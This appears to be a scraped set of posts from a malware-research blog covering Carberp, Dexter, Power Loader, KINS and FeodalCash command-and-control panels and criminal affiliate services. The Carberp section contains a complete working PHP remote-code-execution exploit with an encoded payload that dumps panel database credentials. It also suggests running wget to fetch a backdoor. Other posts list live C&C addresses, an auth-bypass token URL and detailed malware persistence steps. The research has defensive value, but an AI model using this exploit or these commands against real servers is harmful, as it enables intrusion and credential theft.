Brace yourself, Carberp C&Cs start already to appear.

Carberp C&C

$
0
0
And here we go, first Carberp panel i break from the leak, surely a test one, gateway was badly configured like domains.

Login:
To view the login page sometime you need a special key like:
/login/?x=11111111111111111111111111111111

It was not required on this server but if you want an example let's try on another Carberp C&C.
Without:
 With:

Dashboard, License Information:

Statistics:

Bots:

Diagram:

Search:

P2P:

Host:

Tasks:

Add a task:

Links:

Logs:

Filters:

Cab-files:

iBank:

Keylogger:

Add program:

Recycle bin:

AutoSystem:

Add domains:

Builds:

Add builds:

Settings:

Users:

User settings:

User permissions:

Edit user:

User information:

About my previous post, fun fact: in 2011 i've already found traces of logs in a C&C, and mystic compressor was used on the sample.
(14:44:15) Павел: надо в админку добавить
1. смотреть все логи по одному боту!
(14:44:27) Павел: показать всех ботовс RU онлайн чисто! логи по ним
(14:44:30) Павел: чтоб глядеть есть ли баги и тд
(14:45:40) aksoft@188.72.206.204/work: оказать всех ботовс RU онлайн чисто! логи по ним - это уточни
(14:45:57) Павел: ну вот чтобы вывод фильтровало
(14:46:14) Павел: нашло всех ботов у которых такая строка в логах есть:
isOfflineVersion = false isOnlineVersion = true
(14:46:18) Павел: language = RUS
(14:46:30) Павел: и после этого логи по ним всем чисто показала! лог вывела
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=747

Carberp Remote Code Execution: Carpwned

$
0
0
Everyone are looking at the Carberp source, bootkit and other components but did people investigated the panels source ?
I don't know who did the PHP but he deserve a medal, it's more easy to hack than SpyEye. (yeah i didn't think it was possible too)

Here i will talk about a simple code injection but there is a lot of others vulnerabilities in theses leaked panels.
e.g: stupid code allow IP spoofing:

No but seriously the best vulnerability is the RCE one, the guys who coded this is really mentally retarded:
look at this eval() look !

Oh good timing, some Carberp C&C appeared on vx.vault:

Let's write a spl0it now, i think most of you come here for a PoC right ?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>

The 'encoded' part do a file_get_contents() on includes/config.php
Then connect to the SQL db and show the Carberp credentials. (in case if we don't have phpMyAdmin)
But it would be useless if we can't show the login page due to Auth key so it parse index.php and retrieve it.
Cool payload huh ?
Let's test it so...

37.221.165.123:

91.214.202.117:

I've tested on some others C&C and everything went fine.
And it's a RCE so you can execute some cool shit like system('wget http://xxx.xxx');
To download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram' ?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
oh really, who's fucked now ?




Money laundering

$
0
0
Please refer to the following Web site: http://krebsonsecurity.com/2013/06/cashout-service-for-ransomware-scammers/

Login:

Table check:

Дорогие клиенты в связи с падением пробива на эксплойтах вы вынужденны поднять цену! Цена теперь 0.6
Приношу мои извинения что так получилось, но меня заставляет рынок!
И еще правила возврата я всем объяснял не раз , возврашем тока чек которые у меня возвращается если его потом с наливаем резкий лок акк будет теперь ! Есть много людей кто идет без возвратов вообще , вот я оставлю только таких людей заранее предупреждаю.
Translate (thanks @Malwageddon):
Dear customers,
Due to low callback volumes on the exploits we have to raise the price bar!
The price is now 0.6. My sincere apologies, but the current market leaves
me no choice!
And one more thing, I have explained the return policy many times now - we
only return checks that return to me. If you cash it out your account will
be locked immediately. I have many people who do not have any returns, I
think I'll be only working with these people going forward - giving you
warning in advance.

My check:

Logs:

var_dump() mode:

We tell us some interesting query like:
select * from users where id = 8
select * from checks where user_id = 8 and validated=3
select count(*) c, sum(amount) a from checks where user_id=0 and validated=2 order by id desc limit 1000
select count(*) c from checks where user_id=0 and validated=0 order by id desc limit 1000
select * from checks where user_id=0 and validated=2 order by dt desc limit 1000
select * from log where user_id=8 order by id desc limit 1000
#!/usr/bin/php SQL:select `check`, count(*) c, min(id) m from checks group by `check` having c > 1 order by c

https://www.betamerica.com/login_simple.jsp
proxy:socks://**.***.***.224:29583
Meisbatman:******

betamerica.com is an online gambling site, they probably use this service to launder money:

History:

Pony:

Micro camera for skimmer

$
0
0
Dimensions : 45mm x10mm x3mm
Video compresion : Xvid high compresion
Memory : micro SD 32 GB
Consumption : 100 mAh / 1 hour
Size of the video : 200 Mb / 1 hour
Resolucion : 352 x 288 (configurable a 640 x 480)
Fps : 10 fps ( configurable of 1 to 30 fps)
Bit ratio : variable (without motion recording with 10 fps ,with motion recording with 30 fps )
Lux : 0,75 lux
Volage : 3,7 V ( suported 5V)
2 modules cam : long and short


Pictures:

FeodalCash Affiliate (Trojan:Win32/Tarcloin)

$
0
0
FeodalCash is a malware affiliate who push Bitcoin miners, saw that since a long time but i never really got interested by this until recently.

Advert from a parter:

FeodalCash:

"Free registration" look's weird for a black affiliate, but wait: you should talk with them in ticket to get your exe activated
We have also a warning message at the top in red saying "Don't submit our file on virustotal but use private AV checker like chk4me.com and scan4you.net."

FAQ:

Promo:
No exe because my account is not activated for the moment.

Payout:

Soft:
"Add our software
(can be downloaded from "Promo" section on our site) to the same folder you saved the file to.
Rename our software to whatever you like (Skype.exe, Setup.exe , Óñòàíîâêà.exe, etc)
Distribute these two files using your sites and receive money. (we recomend to archive both files with ZIP or RAR)"

Rules:
"Partners are not allowed to use any software or technologies including virus programs that will affect your statistics and rewards."

How to hide the miner on a SFX archive (lol?):

News:
 "2013-07-05 11:07 - Payments completed
Dear slave masters, check your wallets you should have received your shares now.
We are glad you're working with us.
Regards, FeodalCash"

Let's talk with them so.
2013-07-15 19-33 - AloneDestiny wrote:
Hello! I'm a new partner in your affiliate program.
I can provide around 2 tons CA/USA real PCs daily, but i got a question, do you accept installs from exploit kits and malware?
My domains are always clean.
No need to worry about the EXE.
In terms of honeypots and other rubbish, I'm working for quality and have no time for such things.
I hope for effective partnership taking that EK and malware is not a problem for you.
Oh, and the last thing, does your EXE support silent install?
Regards,
Peter

2013-07-16 06-10 - igor wrote:
Good day.
Does '2 tons' mean 2 thousands?
Not much to be honest, unless these are installs and not hosts.
We have different versions of EXE and one of them is hidden.

2013-07-16 13-10 - AloneDestiny wrote:
Good day.
Yes, it's 2 thousand installs...
Theoretically, if what you say in FAQ is true and it's not using .NET the install rate should be fine...

2013-07-16 13-52 - Administrator wrote:
ok, we created a sub-account for you, happy enslaving ))

Okay cool, what's about malware policy ?
2013-07-16 16-29 - AloneDestiny wrote:
Thanks, about install you have not answered me:
It will be a problem if install come from malware, or it's fine ?

2013-07-16 16-37 - igor wrote:
let's try it...
But if we are going to receive compains or abuse reports we will ask to stop the traffic...

Promo:

EXE:

Script:
Stat:

When the exe is built we are redirected for download:


Domains have the same IP, VirusTotal also know them well: https://www.virustotal.com/en/ip-address/5.61.46.128/information/
And it's also on vx.vault: http://vxvault.siri-urz.net/ViriList.php?IP=5.61.46.128

 Fresh bin: https://www.virustotal.com/en/file/2ad065c526d7c3fe0967d3773765dde3993c96fa4cc2f641cce16a7b40805cc0/analysis/1373973030/
Another Bin: https://www.virustotal.com/en/file/865ee01f829539e0fc12178618de8e4c8191ded23919666599538e4a6fc7823d/analysis/1373969781/

After unpacking the lame cpp packer and upx, we have a lame Visual basic executable:
https://www.virustotal.com/en/file/f4bf7e34744c5a9a60134189234f3e20628cebf39ef6a373228df7b8f0ab5ed3/analysis/1373969774/

Just by looking at strings you can have a global idea of what the exe gonna do:

Installer not so silent when you run it 'extracted':

a vbs file is created and run, this vbs file create a registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Service
with: %APPDATA%\dllhost.exe
Then it do two copy of the 'installer'
- %APPDATA%\dllhost.exe
- %APPDATA%\dllhost2.exe

Some files are unzipped:


miner configuration:
Probably a worker account, it would be dangerous for the affiliate to put the master account on the exe.

If we go to the pool for see wallet statistic:
Not so much.. only about 0.55 BTC (around 55 USD)

There is a 'debug' feature if you create the file %APPDATA%/feodalcash.txt with some datas on it:

miner unpacked: https://www.virustotal.com/en/file/3637455a4ee0500d93e759ac6bbdaad1da32b62b43af8635a22abf1096c9e928/analysis/1373990984/

Some domain found on the exe:
the executable use the free service 'whois.tcinet.ru' to get a whois on 'buy--car.ru' then stuff is parsed by searching 'nska1' 'nska2' etc...
Cool NS huh ?

Then it decode a string and call 'pastebin.com/raw.php?i=k5ckPmLv' (the decoded string)

Then do a CreateFile for 'lkfjl23j.db' and some others, call the affiliate with another decoded string
'gamesvk.org.ua'
url structure: /in/open?hwid=70144646&s=115

gamesvk.org.ua is registered to feodalcash and known in VirusTotal with no surprise.
https://www.virustotal.com/en/domain/gamesvk.org.ua/information/

rundll32.exe is executed, this file have network activity with ICQ.
Unpacked: https://www.virustotal.com/en/file/574d79e510fa44fa5497f5a5574d94ecc76a98f4eb60fa0d951d93fdd53d7bd7/analysis/1373989146/

 2ip.ru:
Infos are parsed:

Open a socket and try to communicate with it but the port used is closed on the server
Anyway the IP is know on vx.vault: http://vxvault.siri-urz.net/ViriList.php?IP=109.236.88.201

svchost: https://www.virustotal.com/en/file/de8ef7906a879f0820048a71c003288333debd1765744773d7ae8195c71635bb/analysis/1373991684/

Overall it's a pretty lame malware, and not really stealth at all, Win7:
XP:

Feodalcash is powered by Django.. hmm well, thank you.

 Admin dashboard:

Users:

Group:

Daily profit:
64472 daily profits.

Load ping:
25512 load pings.

Open ping:
158901 open pings.

Payout:
668 payouts.

Pings:
146515 pings.

Referal payout:

Subaccount:
 237 subaccounts

URL:

User infos:

Wallet adress:
 268 wallet addresss

Bitcoin adress:

Payement:

Transaction:

Wallet transaction:

Wallets:

News:

Pages:

Site:

Tickets message:

Tickets:

Now that we got a view of the administrative panel, let's see from the affiliate interface.
Tickets:

Dashboard/affiliate stats:
First button is to go on admin panel, second is to view user-list, and the last one is to make partner payments.
Total speed: 85864,784 Mh/s, that's around 1,651 BTC or 119,088 $ per day
Current Metabank rate: 98,5 $ per bitcoin
Already paid: 6873,390 outstanding 937,840 $
Totally mined: 140,234 BTC

User lists, Sub-accounts:

Masspay:

'partner apply tickets' are also interesting, we have some nice actors, for example: parmezan
"Hello, here is a traffic screenshot as you asked, i masked a lot of things, this parthner program is private, i'm not sure if they will be happy knowing that someone took a screenshot, but anyway, i'd like to try to direct traffic to you! http://www.stooorage.com/show/1601/9186728_av.png"

Screenshot in case of delete:
2553.64$ via the BestAV Affiliate, not bad.

FakeAV abandoned affiliate

$
0
0
Appeared also recently on vx.vault: http://vxvault.siri-urz.net/ViriList.php?IP=31.184.244.2
https://www.virustotal.com/en/ip-address/31.184.244.2/information/

hxxp://topqweb.org/content/scc
hxxp://rowline.org/api/ping?stage=1&uid=5cda27721bcbf14da53e8aad2fc722c2&id=35&subid=1&os=1&avf=0
hxxp://rowline.org/api/ping?stage=2&uid=5cda27721bcbf14da53e8aad2fc722c2&success=1
hxxp://rowline.org/load/?uid=5cda27721bcbf14da53e8aad2fc722c2
hxxp://rowline.org/html/viruslist/?uid=5cda27721bcbf14da53e8aad2fc722c2
hxxps://secure.9billing.com/html/billing/?uid=5cda27721bcbf14da53e8aad2fc722c2


Antivirus System is from the same familly as PC Defender Plus and Multirogue Defender
Unlock code xOxZxLxWxIxTxFxQxCxNxYxKxVxHxSxE still work for manual registration.

Main:
Geo:
Subacc:
Get EXE:
Profile:

A code mistake allow you to view the stats without being logged if you know the good token:
hxxp://dapav.net/subacc/?type=lol&token=da01a28ac6bbbf228ba9dc52c98ea1b0
hxxp://dapav.net/geo/?type=lol&token=da01a28ac6bbbf228ba9dc52c98ea1b0

400 installs

Point-of-Sale Malware: Infostealer.Dexter

$
0
0
Haven't posted since a while so let's do something...
Back on some old material, due to a 'recent' compromission of off-sho.re servers, and the circulation between AVs of Cyberbunker sinkholes logs. (Especially the Alina connections was interesting, but that not the topic)
Did you remember Dexter ? nah not the TV Series, but the PoS Malware.
Systems infected by Dexter are various in our case (gas stations, pawn shops, logistics, luxury shops, doctors, clinics, pharma, labs,  etc...)
This malware was coded by a guys know as 'dice' (there was an advert on Darkode made by him around November 2012 if i remember, but he requested an admin to remove the thread so it's not anymore available)
Visa USA have released an alert one month after.

 Sample who come from the compromised server:
Let's see so, i will avoid you the Visual Basic 6 unpacking step, if you want the hashs.
Original: bb0b17c2f66a868cf1e8a46626366a32
Depack: e74593552b66a4638b80a4fbf2fb7438

Create a mutex:

Determine if we are under x64:

Creat a suspended process of IE:

Copy the EXE in memory:

WriteProcess Memory on Internet Explorer with the content of the exe:

Then he a do a CreateRemoteThread on IE and ExitThread on this process.
 Ok, what's happend with the injected IE ?

I've patched the executable by taking some jumps he have not took at the begining to make it think we are in IE and see what's happend.

Create a subkey 'HelperSolutions Software':

Create a folder %APPDATA%/Java Security Plugin then CopyFile and do a DeleteFile on the original exe.

Do a RegCreateKey/RegSetValue/RegCloseKey with 'digit' as registry entry and 'cc98afca-1a04-4c5d-80cf-1cc78244b63e' as value for me.

Create a registry persistance 'Sun Java Security Plugin':

Do the same but this time in HKCU:

Create another registry entry but this time:
HKCU Software\Microsoft\Windows\CurrentVersion\Policies\Associations
With 'LowRiskFileTypes' and '.exe;.bat;.reg;.vbs;' as value
The 'Policies\Associations' subkey lets you manage the default risk level for file attachments (Low-risk/Medium-risk/High-risk file types)
The attachment manager in windows can help protect your computer from unsafe attachments that you might receive with an e-mail message and from unsafe files that you might save from the Internet.

Edit a value at HKCU: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
Registry entry '1806' and '0' as value
'1806' is the registry entry about launching applications and unsafe files in internet explorer.
The value can be zero, one, or three, typically, a setting of zero sets a specific action as permitted, a setting of one causes a prompt to appear and a setting of three prohibits the specific action.

Do the same operation but in HKLM this time:

The file initialyse a thread:

Extract a ressource:

Create a DLL 'SecureDll.dll' with the extracted ressource and attribute Hidden:

Load the dll:

Create a path:

Create a reg key at Software\HelperSolutions Software
'val1' and with value 'C:\Documents and Settings\Administrateur\Bureau\strokes.log'

Create a second reg key at Software\HelperSolutions Software
 'val2' and with value 'C:\Documents and Settings\Administrateur\Bureau\tmp.log'

Hook the keyboard:
 Refer to the MSDN for explanation:

Okay... let's have a look on what's this SecureDll.dll do, seem it's not that secure.
Look for previous reg key:

 val1 and val2.

Look for some specific process who run on the system:
 Here is a list:
wmiprvse.exe (Microsoft Windows Management Instrumentation)
LogonUI.exe (Windows LogOn User Interface)
svchost.exe (Service Host Process)
iexplore.exe (Internet Explorer)
explorer.exe (generic Windows process)
System (Internal Windows system process)
smss.exe (Session Management Subsystem)
csrss.exe (Client/Server Runtime Subsystem)
winlogon.exe (Windows LogOn Process)
lsass.exe Local (Security Authority Subsystem Service)
spoolsv.exe (Printer Spooler Service)
alg.exe (Application Layer Gateway)
wuauclt.exe (Windows Update client for WindowsME)
firefox.exe
chrome.exe
devenv.exe (Microsoft Visual Studio)

Then he start to open process and look for track1/2/3

And when finaly something is detected:

 Make it as string:

After looking at all process he will create some threads:

The first will just do a new scan of process.
Second thread make sure everything is ok with the registry key 'run'
Tree do a loop
4 detect if the pc will got shutdown (i've not looked but DetectShutdownClass seem enought explicit)

Then he start to enter in a procedure to call home:

Get user name:

Get the computer name:

Get the OS version:

Architecture:

Retrieve the string used to identify the machine who was stored on the registry database
(cc98afca-1a04-4c5d-80cf-1cc78244b63e)
Open strokes.log and read it

Then Delete it:

Read the content of tmp.log:

Enter in a decode routine:

Create a file Debug.log:

Write it:

And delete tmp.log:

Take our hwid and enter on the routine to code it:

Then he will do that again but with the process name he grabbed tracks info, take also pc infos etc...

From the original source code:
At the end we have a huge strings like:
page=RUUZTk9FSURRTk1OHVFIGBhJUUQYRUpRSkQaTUwYSUhNTx0f&ump=ACgZHREqFRkLGQ4jLxkOChUfGVIZBBlGR0hNTU1NTU1NTU1NTU1NTU1BTU9MS01MTUxMTExMTExMTExKSkpDWT5ITU1NTU1NTU1NTU1NTU1NIiQlMDU+MyRTMD0+L1wxLiJNT0xLTUxNTExMTExMTExMTExMTExMTExMTExKSkpMTE
C&C domain and gate path are given via pointers due to the internet explorer injection.

After having called the gateway, then Dexter do a 600000 ms sleep (10 mins):

And do the shit again, then re-call home each 10 mins.

Now about the C&C responses, i noticed these actions
update-
chekin:
scanin:
unistall
download-

I've not searched how works the following commands, Josh Grunzweig of SpiderLabs already explained it.
So... enough boring reversing infos, let's have a look on the panel now.

Login:

Dashboard:
More than 3000 bots, most of them are commercial machines.

Like Alina, Dexter use colors code, dead bots appear in red and recent dead bots in blue:

Dumps (stolen credit cards):

Keylogger logs (here, that seem to be a UPS dispatch center, or something like this):

Process viewer (not working):

Another but small Dexter panel:

I've found also an older version of Dexter, i thought it was Alina at first but nope, Dexter v1:

Dashboard:

Dumps:

Bots:

Process list (this time it work):

Uploader was not found due to a programming error:

Dexter 'v2' C&C structure:
Just ignore the 'installer' folder that something homemade for a video PoC.

Get track type function:
That even grab track3.



600 posts reached ;)

Power Loader 2.0 (Alueron)

$
0
0
Hello, i had to do this post to introduce you the C&C of Power Loader 2.0, due to a futur post about another malware based on it.

Advert:

English version, translated by Malwageddon (thanks again!) :
PowerLoader v2.0

[Preface]
Anyone who's in this business knows how difficult it is to find a good product with a good support.
Lots of software currently on the market is lack of the support and uses some ancient technologies with questionable bypass techniques.
So, here is the description of the loader that will solve these problems and increase your earnings.

[Loader Description]

- Private pro-active defences bypass code, includes a number of private OS integration methods.
- Uses private process attach method for (32bit/64bit), doesn't hang in the processes.
- Bypasses are implemented and working on all OS versions (xp/server/vista/7, user/admin, uac/on/off, 32bit/64bit)
- Successfully bypasses 32bit/64bit: Outpost, ComodoIs2012, Kis2013, Avg2013, ZoneAlarm, Avast, Dr.Web, F-Secure and many more.
- Protects and hides the loader, allows to restore your files, random filenames.
- Supports DLL injection in 32bit/64bit processes.
- DLLs are stored encrypted and injected into the processes by the loader.
- Doesn't store any leftover/rubbish files on the disk - integrity level.
- The only file that is left on the system and the only file working is your EXE(32bit), encrypting is done on that file only.
- Network activity is hidden from the firewalls, traffic is encrypted with RC4, supports backup servers.
- High callback rate and lifetime.

[Admin Panel]
- Easy to use multifunctional admin panel.
- Provides different load and execute commands for different types of files including DLLs
- Configuration editing, loader update, many other settings.
- Detailed statistics by date/build/countries/OS, live/dead/online/new bots.
- Tasks assignment by countries/builds with all necessary options.

[How to buy]
- We sell two loader versions - with and without DLL support. Number of licences is limited.
PowerLoader v2.0 Build - 500LR/WMZ
Rebuild for a new domain - 50LR/WMZ
Constant updates and support, latest technologies and high quality that will provide you with easy operation and bring top earnings.
Please contact support if you have any questions:
....@jabbim.com
Ready to take any tests on.
It's not says ont he advert but the source of Power Loader was also on sale.

The authentication is do simply like this:

When you are inside:

Stats system:

Stats country:

Task:

Add a new task:


Files:

Add file:

Settings:

Logs:

About the structure of Power Loader it has the following:
EXEs are stored inside the folder /files/ and are encoded/renamed (RC4) to avoid researchers.

Leaked builder of Power Loader:

If you want some good read about Alueron you can click on the following link:
- Gapz and Redyms droppers based on Power Loader code
- PowerLoader Injection - Something truly amazing
And get some sample a well as interesting reads here:
- Power Loader (blast, alias Alureon)

Having a look on the KINS Toolkit

$
0
0
I finally got KINS since 2,3 weeks, those who follow me on youtube probably noticed it due to my videos.

KINS is the acronyme for Kasper Internet Non-Security, the guys of RSA Security have made an article  here: https://blogs.rsa.com/is-cybercrime-ready-to-crown-a-new-kins-inth3wild/
The advert was took on a (lame) forum know as 'verified', hread got removed later, as usual when they see that someone use their advert to blog.

I've read also the Fox-IT article about 'kins' but did they even know what they are talking about ?
The picture of the CNC just looks like a regular zeus with a bit of CSS work.. and the hashs didn't look like Zeus but also didn't look like the Kins i get..
"users of KINS have migrated to"
Interesting, that means KINS was something before what me and criminals call KINS now..
Small edit: and that was true and i was wrong, my apologies goes to Foxit guys.
I mean, if you look on underground forums, e.g: Darkode, exploit.in etc.. KINS stand for this modular alueron (even on verified or any other undergound boards)
i know i've wrong but what's can i say when most of peoples call this KINS so.. let's call this KINS even if it's not the good things to do.
No one (just S21 guys?) blogged about this variant.

After finally got KINS, i've sent it to RSA Security due to the weird article of Fox-It and also because i appreciate more the guys of RSA :) (and i know no one at Fox-It)
We have do a 'collab' analysis of the package.
The KINS 'leaked' package (not really 'leaked' for the moment but 'for sale') is composed of many folders like:

The folder source is half complete but we have already a good insight of what KINS do.
MS10-073 (win32k.sys KeyboardLayout vuln)
MS10-092 (Task Scheduler vuln)

Some files seem to come from the Carberp leaked archive, eg with the folder 'common':

VMProtect SDK:

KINS dll:

Many file names are evocative, KINS is basically: Zeus 2.0.8.9 + Power Loader 2.0 + SpyEye Plugins
And not like Citadel, KINS is almost 99% a "copy/past" of Zeus.

output (malware builder and dlls):

admindropper (Power Loader modified panel) aka 'A':

admincore (Zeus modified panel) aka 'B':

Builder folder is the first folder i've open:

KINS Builder 'Debug version'.

output:
Dropper.exe is detected as Alureon by Microsoft (Power Loader)
Bot32.dll is detected as EyeStye.plugin by Microsoft (SpyEye)
Bot64.dll is dected by just one antivirus (SUPERAntiSpyware) and the signature is generic (LOL!).

Bot32 is a Zeus bot, he have several strings related to SpyEye.
This is probably why Microsoft identify it as it.
"C:\Zeus projects\last\src_current\source\clientdll\spyeye_modules.cpp"

If you start it like this way:
rundll32.exe bot32.dll,ImageLoadNotifyRoutine
It start to write C:\debug.txt like zeus does when it starts in debug mode but then rundll exits and nothing happen.
When you inject it now, (inside iexplorer.exe for example) it grab datas and do the usual things Zeus do, no more no less.
And you can see/dump the base config from memory, it's easy to identify the drop zone and see webinjects.
well like Zeus huh ?

Original WebInject:
Here, the 'test' webinject do not work because ya.ru redirects to yandex.ru

KINS come also with a readMe, who explain you the life about Zeus webinjects and the package.

For the dropper well it's Alureon... MS10-073, MS10-092 injection of bot32.dll is working good.
If you want a reliable signature to identify KINS you can use Trojan:Win32/Alureon.GC of Microsoft.

During all the infection process, the dropper do several OutputDebugString making the routines identification  relatively easy.
This KINS package seem more a test version not yet finished than a final package ready for customers.

For the x64 DLL of KINS and the x64 Dropper.... as i don't have this architecture i've not looked into thoses files.
After, why AV detections have vanished on the x64 versions... no idea.

Now for other files in the 'output' folder we have:
mod-killer.dll (kills SpyEye and Zeus based malware, e.g: Citadel, Ice9, Evolution...)
socks5Server32.dll (for do reverse connections through a proxy server, we have also socks5Server64.dll)
softwaregrabber.dll (Grab passwords,email,ftp,cookies,certs...)
those plugins remind you something ?

An interesting file was also 'builder_debug.exe.vmp':

181.191.255.130 ~ AS52284 Panamaserver.com

Guess what's did you find on this IP... A VMProtect panel:
For Kins licenses ?
This is what i thought first but finally there is nothing interesting inside, it's more like a 'test' implantation.

There is also a CCGRAB panel (usually used in addition for SpyEye,Zeus,Citadel,IceIX):

Once again here, nothing interesting.
 Just some details:

And with a bit of data mining, i've remounted to the coder of KINS.
I got an interesting chat with him, and he confirmed my doubt about the leak of the non-finished product.


Some files are also hosted on this server and once again nothing interesting (wtf!):
grb32.dll > 0/46 (who pop-up alert window)
torrent.exe > 13/47 (is Cidox, not kins related)

Having a look on the folder 'admincore':

/theme/throbber.gif:

You probably guessed it from the folder structure, this is a Zeus control panel (with a slightly modification).
For information, here we have fixed the errors and translated the panel to English with the help of @Malwageddon.
This panel was only available in russian language and was also full of bugs (php errors everywhere)

Installer:

CP login:

Summary:

Bots:

Search in database:

Jabber notifier:

Options:

User:

Users:

For the folder admindropper:

config.php:

.httpd.conf:
 "Lookbehind"

Install:

Stats:
Unlike the previous panel this one got really more code modifications.
As well as the curious title "bdrop v0.5 admin panel" instead of "PowerLoader v2.0"
See my post here for Power Loader:  http://www.xylibox.com/2013/09/powerloader-20-alueron.html
Here again the panel was only in russian language and also full of bugs, the screenshot above was taken before our english translation.

Stats:

Bot list:

Tasks:

Add a task:
Files:

Add a file:

Settings:

Logs:

Something fun is the fact that everyone seem to have the same problem with KINS (broken panels) and all panels that we've dumped from malicious servers was similars with the same errors.

KINS on a malicious server with SSL for MitB webinject:


Zeus 2.0.9.15:

To finish... here are two demos, for those who haven't see them:
KINS Webinject in action: http://www.youtube.com/watch?v=4dL-WTyY6LM
Hacking KINS: http://www.youtube.com/watch?v=NVlqnKPZguw

AV guys: 90CAC1E1AD70EF5433B4E12EFCF78847

Inside a malware campaign: Alina + Dexter + Citadel

$
0
0
I am going to start this article by mentioning that the server i am about to talk was under strong investigations.
But now i can talk, and there are some interesting things i want to mention about Alina and Dexter (both most popular PoS malwares for the moment).
Please note that my Dexter article is from this campaign.
First of all, i am in possession of a chat log, and i can certainly affirm that author of dexter (Dice) had Alina source, so its possible he coded them both.
The chat log is between dice and deputat (see my other article who's behind alina).
